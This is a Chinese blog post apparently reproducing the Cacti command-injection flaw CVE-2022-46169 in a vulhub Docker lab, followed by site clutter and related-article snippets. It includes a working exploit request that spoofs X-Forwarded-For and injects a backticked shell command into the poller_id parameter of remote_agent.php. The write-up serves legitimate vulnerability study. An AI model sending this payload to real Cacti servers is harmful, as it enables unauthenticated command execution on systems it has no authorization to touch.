Cacti 前台命令注入漏洞(CVE-2022-46169) vulhub漏洞复现

最新推荐文章于 2024-07-07 17:29:21 发布
最新推荐文章于 2024-07-07 17:29:21 发布
阅读量501 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/131772322
版权

Cacti 前台命令注入漏洞(CVE-2022-46169)

Cacti是一个服务器监控与管理平台。在其1.2.17-1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。

漏洞复现

靶机ubuntu:192.168.126.128

攻击机kali:192.168.126.130

cd vulhub-master/

cd cacti/

cd CVE-2022-46169/

docker-compose up -d

访问http://192.168.126.128:8080会跳转到登录页面

账号密码为admin/admin

在这里插入图片描述

进入后一直点下一步进行初始化

在这里插入图片描述

漏洞的利用需要Cacti应用中至少存在一个类似是POLLER_ACTION_SCRIPT_PHP的采集器,接下来创建一个新的图形,选择Device - Uptime”,点击创建。
在这里插入图片描述

攻击准备

1.打开攻击机kali:192.168.126.130

启动burpsuite,抓包,发送如下数据包:

GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`touch+/tmp/hacker` HTTP/1.1 X-Forwarded-For: 127.0.0.1 Host: 192.168.126.128:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 2

在这里插入图片描述

回到靶机ubuntu漏洞目录下:docker-compose exec web bash

在这里插入图片描述

hacker文件被成功创建

芝士土包鼠
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Cacti命令执行漏洞复现(CVE-2022-46169)
0xSec
02-02 3837
Cacti项目是一个开源平台,可为用户提供强大且可扩展的操作监控和故障管理框架。在1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令漏洞编号:CVE-2022-46169漏洞等级:严重。
漏洞复现CVE-2022-46169 Cacti命令执行
m0_53121608的博客
07-13 513
漏洞复现CVE-2022-46169 Cacti命令执行
Cacti命令执行漏洞分析 (CVE-2022-46169)
whoami
12-07 3985
Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。在本漏洞中,攻击者可通过控制由get_nfilter_request_var()函数检索的参数$poller_id,以及构造local_data_ids参数,满足poller_item =POLLER_ACTION_SCRIPT_PHP条件,触发proc_open()函数,从而导致命令执行。Cacti < 1.2.23从漏洞补丁可以看出,本次漏洞点主要存在于lib/functions.php、remote_age
漏洞分析|Cacti命令执行漏洞 (CVE-2022-46169)
xuandaoren的博客
01-12 833
漏洞存在于remote_agent.php文件中,未经身份验证的恶意攻击者可以通过设置HTTP_变量绕过身份验证,再通过构造特殊的$poller_id 参数来触发proc_open() 函数,成功利用此漏洞可在目标服务器上执行任意命令,获取服务器的控制权限。gethostbyaddr 对 client_addr 获取网络主机名,当 $client_name 与 $client_addr 不同时, 进入remote_agent_strip_domain 函数。函数的作用是直接获取参数,没用过滤。
Cacti 前台命令注入漏洞
SwBack的博客
05-08 950
Cacti是一个服务器监控与管理平台。基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具. 在其1.2.17-1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令
CVE-2020-8813 Cacti v1.2.8 RCE.MD
04-13
CVE-2020-8813 Cacti v1.2.8 RCE
CVE-2020-8813:Cacti v1.2.8远程代码执行CVE-2020-8813的官方漏洞利用
03-08
"CVE-2020-8813的官方漏洞利用"可能是指社区或Cacti官方发布的漏洞复现代码或测试脚本,这些资源可以帮助管理员验证他们的系统是否受到影响,或者帮助安全研究人员理解漏洞的工作原理。通常,这些利用工具会详细解释...
CACTI-95计费模板
02-21
CACTI-95计费模板,CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-...
cacti-0.8.7e-cn-utf8.tar.gz
02-09
1. **解压文件**:首先使用tar命令解压文件,如`tar -zxvf cacti-0.8.7e-cn-utf8.tar_1612877418`。 2. **安装依赖**:确保服务器上已经安装了Apache、PHP、MySQL以及SNMP等必要组件。 3. **配置数据库**:创建...
CVE-2022-36446 Webmin命令注入漏洞复现
热爱学习,喜欢折腾!
08-15 3618
Webmin是一款功能强大的基于Web的Unix系统管理工具,管理员可以通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。近日,Webmin被披露存在一个任意命令注入漏洞CVE-2022-36446),其CVSS评分为9.8,目前该漏洞的PoC/EXP已公开。Webmin版本1.997之前,由于缺乏输入清理,导致可以注入将连接到包管理器调用的任意命令。经过身份验证且有权访问软件包更新模块的用户可以通过在新软件包安装期间执行 OS 命令注入实现在系统上以 root 权限运行命令。........
【春秋云境】 CVE-2022-24663复现
小高工作室
11-24 2355
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。直接访问http://eci-2zei2lxiq05pi7hyrjxd.cloudeci1.ichunqiu.com/fuck.php。提示任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。发现是个wp的后台。返回状态码为200表示成功。这里指的是任意PHP代码并且是任意位置。
CVE-2022-41622 & CVE-2022-41800 F5 BIG-IP和BIG-IQ远程代码执行漏洞复现
热爱学习,喜欢折腾!
11-29 1329
F5Networks(纳斯达克: FFIV),全球领先的应用交付网络(ADN)领域的厂商,创建于1996年,总部位于美国西雅图市,F5为全球大型企业、运营商、政府与消费品牌提供更加快速、安全以及智能的应用,通过交付云与安全解决方案,F5帮助企业在不损失速度与管理性的同时享有它们所需的应用架构。在设备模式下运行时,分配了管理员角色的经过身份验证的用户可能能够利用未公开的 iControl REST 端点绕过设备模式限制。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8324
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全】实验一(网络拓扑环境的搭建)
最新发布
Elena's Blog
07-07 321
学习利用 VMware 创建虚拟环境学习利用 VMware 搭建各自网络拓扑环境。
网络安全的神秘世界】SQL注入(下)
weixin_54750312的博客
07-04 1417
通过前面的SQL注入实验可以发现,字符型的注入点我们都是用单引号来判断的,但是当遇到 addslashes() 函数时,单引号会被转义,导致我们用来判断注入点的单引号失效。在将数据存入到了数据库中之后,开发者就认为数据是可信的。通过前面的学习可以了解到,SQL注入非常关键的一步就是让引号闭合和跳出引号,无法跳出引号,那么输入的内容就永远在引号里,即永远是字符串,无法实现SOL注入。出现了语法错误,意味着输入的内容会到数据库中进行查询,接下来的步骤就很简单了,跟前面的报错注入是一样的。
网络安全&密码学—python中的各种加密算法
xt350488的博客
07-02 1061
数据加密是一种保护数据安全的技术,通过将数据(明文)转换为不易被未经授权的人理解的形式(密文),以防止数据泄露、篡改或滥用。加密后的数据(密文)可以通过解密过程恢复成原始数据(明文)。数据加密的核心是密码学,它是研究密码系统或通信安全的一门学科,包括密码编码学和密码分析学。在网络安全和密码学领域,数据加密是保护数据机密性、完整性和可用性的关键技术。Python作为一种功能强大的编程语言,提供了多种实现数据加密和解密的方法。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 937
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
Java中的网络安全与防护策略
技术研究中心
07-04 449
通过本文的讨论,我们深入了解了Java中面临的网络安全挑战以及如何有效应对这些挑战的策略和方法。开发人员在设计和实现Java应用程序时,应始终牢记网络安全的重要性,并采取适当的防护措施,确保系统和数据的安全性。在Java中,可以使用正则表达式或者现成的验证框架,如Spring框架中的数据绑定和验证功能(例如Spring MVC的。在当今信息化时代,网络安全问题日益突出,尤其对于Java开发者来说,保障应用程序和数据的安全至关重要。同时,应用HTTPS协议确保数据在传输过程中的安全性。注解)来实现输入验证。
cacti-1.2.16.tar.gz
12-07
cacti-1.2.16.tar.gz 是一个开源项目 cacti 的软件包文件。Cacti 是一个用于监控网络和系统的图形化工具。它基于 RRDtool,提供了强大的图表和图形化界面,帮助用户对网络设备、服务器和应用程序等进行性能监测和故障排除。 cacti-1.2.16.tar.gz 是 cacti 的 1.2.16 版本的源代码文件。用户可以通过下载和解压这个文件来获取 cacti 的源代码,并进行安装和使用。用户可以根据自己的需求编译和部署 cacti,以获取最新的功能和修复的 bug。 使用 cacti,用户可以创建多种类型的图表,例如折线图、饼图、柱状图等,来展示网络和系统的运行情况。用户可以通过添加设备和数据源,配置图形模板和数据采集周期等,来监控各种网络设备和服务器的性能指标,包括 CPU 利用率、内存使用率、网络流量、带宽利用率等。此外,cacti 还支持报警功能,当监控指标超过用户设置的阈值时,可通过电子邮件或短信通知用户。 总之,cacti-1.2.16.tar.gz 是 cacti 项目的源代码文件,是一个功能强大的网络和系统监控工具。用户可以通过下载和使用这个文件,来监控和优化自己的网络和系统环境。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值